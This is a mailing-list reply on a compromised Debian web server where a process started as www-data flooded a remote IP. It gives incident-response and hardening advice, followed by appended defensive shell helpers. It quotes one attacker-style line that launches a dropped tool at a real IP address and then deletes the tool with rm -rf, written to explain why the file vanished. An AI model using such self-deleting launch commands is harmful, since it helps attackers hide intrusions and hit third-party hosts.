Security Basics mailing list archives
Re: found clues about a security issue in a web server
From: Aarón Mizrachi <unmanarc () gmail com>
Date: Wed, 18 Mar 2009 02:51:29 -0430
On Sunday 15 March 2009 11:40:22 kazabe wrote:
Hi. In the latest week my internet connection was frozen. After discarding ISP and routing problems, I saw this process on my webserver (stored behind my router):

www-data 20580 00 00 815 355 ? S 07:16 6:01 ./s 86.23.114.12 80

That process was using all the bandwidth (the address displayed is a remote IP, without any relationship to us). After killing that process, the internet service is normal again. The router and the webserver are running Debian Lenny. The web server is not remotely accessible; all the administration is done physically at the PC. The webserver doesn't have any remote access (no ftp, or ssh, or telnet. Nothing). I tried to find that "./s" but I can't find it yet. How can I detect how that script was injected?
Hi, it sounds like script code exploitation (PHP, JSP, Perl, etc...). Why? Running ./s as www-data sounds like a reverse connection started by the apache user, which is likely to happen in scripting exploitation attacks. More so if you say that the only internet-open port is the webserver's.
------------------------------------------------------
The webserver is only to publish a website related to company internal processes (but it is published to the Internet by a port forwarding from the router). That website uses php and mysql. What can I check to solve that security issue? Thanks in advance.
That security issue happens through badly programmed script code. First of all, what script code is installed on your server (php, jsp, mono asp.net, perl, cgi-bin, etc)? If it's a CMS, is it properly updated? Each language is a bit different from the others... e.g. on php, "safe_mode on" is mandatory for security, "url_fopen off" is mandatory to prevent RFI... Don't use or activate anything that you don't really use... if you don't use cgi-bin, DISABLE IT.
-------------------------------------------------
Location of s: check in /tmp, check in www-data writeable dirs, but remember, s could be deleted when you kill it; a simple bash sentence demonstrates that:

(./s 86.23.114.12 80; rm -rf ./s)

Then when you kill s, the rm -rf acts... and bye bye to s.
---------------------------------------------------
Scope: that ps line proves that a hacker has REMOTE control of a user shell on your server, which is sufficiently bad; you could have trojans/rootkits. (Don't even think about your firewalls; they don't protect you against reverse connections.) A worse scenario involves root compromise and compromise of other systems over the network using mitm, etc...
---------------------------------------------------
Suggestions:
- Take your portal down
- Check your apache logs (/var/log/www or similar).
- Check for rootkits
- Check for
- Create a hard-drive image (http://dcfldd.sourceforge.net/)
- Reinstall (please check if your linux distro is currently maintained, it's so important...)
- Do a server security hardening
- Check for updates and enable auto-updates
- Audit your code (PHP or something), update everything hand-updateable like CMS, etc
- Audit your FS permissions (chown and chmod are your best friends)
- Bring your portal up
- Weekly reboot your server (uptime is the best enemy of security) ;-)
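Added example, not from the thread or its authors: a few POSIX shell helpers for the triage described above, assuming the web-server user is www-data and that /proc is mounted. They rely on /proc/<pid>/exe, which still refers to the running image even after the file on disk has been unlinked, so the suspicious binary can be preserved for analysis before the process is killed.

```shell
#!/bin/sh
# Triage helpers for a box where something like "./s <ip> <port>" runs as the
# web-server user. Assumptions: Linux with /proc, procps "ps", GNU/busybox find.

# List processes owned by the web-server user (default: www-data) together with
# the executable each was started from; unlinked images show "(deleted)".
list_www_procs() {
    user="${1:-www-data}"
    ps -u "$user" -o pid= -o args= 2>/dev/null | while read -r pid args; do
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo "?")
        printf '%s\t%s\t%s\n' "$pid" "$exe" "$args"
    done
}

# Report whether the process image of PID still exists on disk:
# "deleted" (unlinked, as in the "./s ...; rm -rf ./s" trick), "present", or
# "unknown" (no such PID or /proc not readable).
exe_state() {
    case "$(readlink "/proc/$1/exe" 2>/dev/null)" in
        *" (deleted)") echo deleted ;;
        "")            echo unknown ;;
        *)             echo present ;;
    esac
}

# Copy the image of a running process to OUT for offline analysis (hashing,
# strings, AV scan). Works after "rm" because the inode lives on while the
# process runs; do this BEFORE killing the process. Prints OUT on success.
preserve_exe() {
    pid="$1"; out="$2"
    cp "/proc/$pid/exe" "$out" && chmod 0400 "$out" && echo "$out"
}

# Directories the web-server user can write to under the usual drop points:
# owned by that user and user-writable, or world-writable.
www_writable_dirs() {
    user="${1:-www-data}"
    find /tmp /var/tmp /var/www -xdev -type d \
        \( -user "$user" -perm -0200 -o -perm -0002 \) 2>/dev/null
}
```

Run list_www_procs first and preserve_exe on anything with a "(deleted)" image or an unexpected path; only then kill the process, since the on-disk copy may vanish with it.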